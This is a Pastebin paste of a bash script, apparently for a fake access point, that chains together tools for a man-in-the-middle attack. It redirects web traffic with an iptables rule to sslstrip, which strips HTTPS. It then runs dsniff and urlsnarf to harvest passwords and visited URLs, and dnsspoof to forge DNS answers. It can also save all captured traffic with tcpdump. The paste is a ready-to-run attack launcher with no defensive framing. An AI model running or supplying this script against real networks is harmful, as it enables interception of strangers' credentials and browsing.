Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #
- # Chema Garcia (a.k.a. sch3m4)
- # sch3m4@opensec.es
- # http://opensec.es
- #
- RUTA_IPTABLES='/sbin/iptables'
- RUTA_SSLSTRIP='/home/sch3m4/FakeAP/sslstrip-0.6/sslstrip.py'
- RUTA_DSNIFF='/usr/sbin/dsniff'
- RUTA_URLSNARF='/usr/sbin/urlsnarf'
- RUTA_DNSSPOOF='/usr/sbin/dnsspoof'
- RUTA_P0F='/usr/sbin/p0f'
- RUTA_TCPTRACK='/usr/bin/tcptrack'
- RUTA_TCPDUMP='/usr/sbin/tcpdump'
- PUERTO='4664'
- RUTA_HOSTSDNS='' # You have to create a file to use dnsspoof
- if [ ! $# -eq 1 ]
- then
- echo -e "\nUse: $0 <iface>\n"
- exit 1
- fi
- if [ ! $UID -eq 0 ]
- then
- sudo ls / 2>&1 >/dev/null
- fi
- echo -e "[?] Do you want to save the capture using tcpdump? (y/n): \c"
- read SAVE
- if [ "$SAVE" == 'y' ] || [ y"$SAVE" == 'y' ]
- then
- SAVE_FILE=''
- while [ -z "$SAVE_FILE" ]
- do
- echo -e "[?] Filename: \c"
- read SAVE_FILE
- done
- else
- SAVE_FILE=''
- fi
- echo '[+] Adding iptables rule'
- sudo $RUTA_IPTABLES -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $PUERTO
- echo -e '[+] Launching SSLstrip...\c'
- xterm -e sudo $RUTA_SSLSTRIP -l $PUERTO &
- echo 'OK'
- echo -e '[+] Launching Dsniff...\c'
- xterm -e sudo $RUTA_DSNIFF -i $1 &
- echo 'OK'
- if [ ! -z "$RUTA_HOSTSDNS" ]
- then
- echo -e '[+] Launching DNSspoof...\c'
- xterm -e sudo $RUTA_DNSSPOOF -i $1 -f $RUTA_HOSTSDNS &
- echo 'OK'
- fi
- echo -e '[+] Launching p0f...\c'
- xterm -e sudo $RUTA_P0F -i $1 -U -t &
- echo 'OK'
- echo -e '[+] Launching TCPtrack...\c'
- xterm -e sudo $RUTA_TCPTRACK -i $1 &
- echo 'OK'
- echo -e '[+] Launching URLsnarf...\c'
- xterm -e sudo $RUTA_URLSNARF -i $1 &
- echo 'OK'
- if [ ! -z "$SAVE_FILE" ]
- then
- echo -e '[+] Launching TCPDump...\c'
- xterm -e sudo $RUTA_TCPDUMP -i $1 -w $SAVE_FILE &
- echo 'OK'
- fi
- exit 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement